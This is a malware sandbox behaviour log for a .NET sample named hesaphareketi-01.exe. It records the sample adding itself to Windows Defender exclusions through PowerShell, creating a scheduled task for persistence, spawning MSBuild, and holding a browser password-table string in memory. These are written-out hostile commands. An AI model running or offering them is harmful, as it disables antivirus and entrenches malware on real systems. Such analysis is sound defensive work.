            Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2144:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeMutant created: \Sessions\1\BaseNamedObjects\NzbfBFmzGTQOiqKUYiIo
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Temp\tmp470C.tmpJump to behavior
            Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hesaphareketi-01.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: MSBuild.exe, 00000009.00000002.4703980721.0000000003D20000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002F18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003076000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003082000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003030000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.000000000304E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003040000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: hesaphareketi-01.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Users\user\Desktop\hesaphareketi-01.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
